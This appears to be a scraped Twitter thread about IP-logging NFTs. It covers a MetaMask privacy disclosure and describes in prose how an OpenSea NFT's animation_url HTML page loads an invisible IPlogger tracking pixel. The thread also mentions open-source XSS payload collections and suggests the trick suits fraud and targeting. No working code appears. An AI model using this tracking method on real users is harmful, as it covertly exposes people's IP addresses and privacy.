Conversation
Last week publicly disclosed a similar NFT IP logging exploit that allowed an attacker to send an NFT to a metamask wallet and obtain a user's IP address.
twitter.com/alxlpsc/status (3/n)
Quote Tweet
My team and I discovered a critical privacy #vulnerability in the most popular #crypto #wallet.
Are you using MetaMask ?
Well, I have bad news for you - your #privacy is at risk!
@samczsun @gakonst @VitalikButerin @cz_binance @phildaian
medium.com/@alxlpsc/criti
5
1
12
Shortly thereafter, stated that they were going to fix the issue in MetaMask. twitter.com/danfinlay/stat
(4/n)
Quote Tweet
Replying to @alxlpsc @sniko_ and 5 others
Yeah, I think this issue has been widely known for a long time, so I don't think a disclosure period applies. Alex is right to call us out for not addressing it sooner. Starting work on it now. Thanks for the kick in the pants, and sorry we needed it. twitter.com/shazow/status/
1
1
5
Now, I personally don't consider my OpenSea IP logging NFT to be a vulnerability (if I did, I would've responsibly disclosed it to OpenSea via their bug bounty program instead of posting it on twitter/medium for clout).
(5/n)
2
3
6
The way it works is OpenSea allows NFT creators to add an 'animation_url' to the metadata. Animation_urls support several file extensions including .html.
The "payload" is just an HTML page that loads the NFT image and an "invisible pixel" tracker from IPlogger(.)org
2
7
This shouldn't come as much of a surprise
has even open sourced a bunch of fun payloads that you can put in your NFTs to mess with NFT-displaying sites.
(and now that it's bear market he's safe to follow😜)
(7/n)
Quote Tweet
Right now there are ~40 payloads that try attack vectors like breaking out of HTML and quotes, SVGs that contain scripts/HTML, data URLs with various datatypes, XSS via markdown, and others. 3/n
Show this thread
1
6
Anyways, if you're in the marketing, fraud, or tax collection industries then IP logging NFTs are probably pretty useful to you.
There's a bunch of different ways to use them to get user data. The easiest is just to send a target a link to your NFT. (8/11)
1
5
There's a bunch of other ways to abuse this to get user IPs. We've noticed a few NFT collections that are probably obtaining user data.
Some contributors are working on analyzing this as part of our bug bounty program. twitter.com/convex_labs/st (9/11)
Quote Tweet
Round 2 of our @Honest_NFT bounty has just concluded and we're beginning round 3, with a minimum of 4 ETH in bounties up for grabs. 
(1/9)
medium.com/@convexlabs/co
(1/9)
medium.com/@convexlabs/coShow this thread
1
1
5
Ultimately, I think the NFT community needs to agree on standards -- are we ok with consumers fetching NFT data off centralized servers?
If not, we have to inform consumers and pressure NFT-related services to stop doing this. (10/11)
1
2
8
Anyways, I'll keep it short. If you found this interesting and want to contribute to NFT-related research, join the discord channel.
We'll literally pay you to use our tools and/or help us build new ones.
(11/11)
Join us! discord.gg/gJFw7R8bys
GIF
read image description
ALT
We can get a pretty good estimate how much traffic the Vice article drove to the NFT.
1
6
is this art?
2
1
4